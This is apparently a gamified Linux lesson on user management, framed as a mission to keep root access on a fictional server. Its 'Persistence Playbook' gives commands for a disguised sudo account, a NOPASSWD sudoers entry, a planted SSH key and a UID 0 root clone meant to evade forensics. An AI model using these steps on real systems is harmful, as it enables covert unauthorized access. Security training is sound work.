User Management
Create accounts. Establish persistence. Hide in plain sight.
CLASSIFIED SCENARIO
You've gained root access on ARCTIC WIND facility's primary server. Your mission: create a persistent backdoor account that survives reboots and looks legitimate. The account must blend with existing system accounts, have sudo privileges, and leave minimal forensic footprint. Your future access depends on going undetected.
Why User Management Matters
Controlling user accounts is the foundation of system persistence. Understanding user management enables:
- Persistence - Create backdoor accounts that survive reboots
- Stealth - Make malicious accounts look legitimate
- Privilege management - Control access levels precisely
- Defense - Audit accounts, detect unauthorized additions
- Forensics - Trace account creation for attribution
Persistence Techniques
- Legitimate-looking usernames - sysadmin, backup, daemon accounts
- Hidden UIDs - UID 0 clones (root equivalents)
- Service accounts - Blend with system processes
- Sudo access - NOPASSWD entries for frictionless access
- SSH keys - Password-less remote entry
Core User Commands
useradd
Create new user accounts. The primary tool for adding users to the system.
usermod
Modify existing accounts. Change groups, shells, home directories, UIDs.
userdel
Delete user accounts. Use -r to remove home directory and mail spool.
groupadd / groupmod
Manage groups. Add users to sudo, adm, or custom groups.
Command Deep Dive
useradd - Create Accounts
# === CREATE STANDARD USER ===
root@arctic:# useradd -m -s /bin/bash analyst
root@arctic:# passwd analyst
New password: ********
[CREATED] User 'analyst' with home directory
# === CREATE STEALTHY BACKDOOR ===
root@arctic:# useradd -m -s /bin/bash -c "System Backup Service" -G sudo sysbackup
[STEALTH] Looks like legitimate service account
[PERSIST] Added to sudo group for elevated access
usermod - Modify Accounts
root@arctic:# usermod -aG sudo,adm analyst # Add to groups
root@arctic:# usermod -s /bin/bash analyst # Change shell
root@arctic:# usermod -L analyst # Lock account
root@arctic:# usermod -U analyst # Unlock account
# === DANGEROUS: UID 0 CLONE ===
root@arctic:# usermod -u 0 -o backdoor
[WARNING] User 'backdoor' now has UID 0 (root equivalent!)
UID 0 Clones
Any account with UID 0 has full root privileges regardless of username. This is a common persistence technique - creating a second "root" account that's harder to detect.
User Files - Know Where to Look
# === CRITICAL USER FILES ===
root@arctic:# cat /etc/passwd | grep -E "bash|sh$"
root:x:0:0:root:/root:/bin/bash
analyst:x:1001:1001::/home/analyst:/bin/bash
sysbackup:x:1002:1002:System Backup Service:/home/sysbackup:/bin/bash
root@arctic:# cat /etc/shadow | grep sysbackup
sysbackup:$6$xyz...hashed_password...:/home/sysbackup:/bin/bash
root@arctic:# cat /etc/group | grep sudo
sudo:x:27:analyst,sysbackup
[AUDIT] These files reveal all account activity
groupadd - Manage Groups
root@arctic:# groupadd operators # Create group
root@arctic:# usermod -aG operators analyst # Add user to group
root@arctic:# groups analyst # Show user's groups
analyst : analyst sudo operators
root@arctic:# gpasswd -d analyst operators # Remove from group
root@arctic:# groupdel operators # Delete group
Quick Reference
| Command | Purpose | Key Flags |
|---|---|---|
useradd -m user | Create user with home dir | -m (home), -s (shell), -G (groups) |
useradd -r svc | Create system account | -r (system), no home by default |
usermod -aG sudo user | Add to group (append) | -a (append), -G (groups) |
usermod -L user | Lock account | -L (lock), -U (unlock) |
userdel -r user | Delete user + home | -r (remove home), -f (force) |
passwd user | Set/change password | -l (lock), -u (unlock), -d (delete) |
Persistence Playbook
# === COMPLETE BACKDOOR SETUP ===
# 1. Create stealthy account
root@arctic:# useradd -m -s /bin/bash -c "Backup Daemon" -G sudo sysbkpd
# 2. Set password
root@arctic:# echo "sysbkpd:hunter2" | chpasswd
# 3. Add NOPASSWD sudo access
root@arctic:# echo "sysbkpd ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/sysbkpd
# 4. Plant SSH key for keyless access
root@arctic:# mkdir -p /home/sysbkpd/.ssh
root@arctic:# echo "ssh-rsa AAAA...your_key..." >> /home/sysbkpd/.ssh/authorized_keys
root@arctic:# chown -R sysbkpd:sysbkpd /home/sysbkpd/.ssh
[PERSISTENCE ESTABLISHED]
Account: sysbkpd | Shell: bash | Sudo: NOPASSWD | SSH: keyed
Ready to Establish Persistence?
Test your user management skills, then create your backdoor.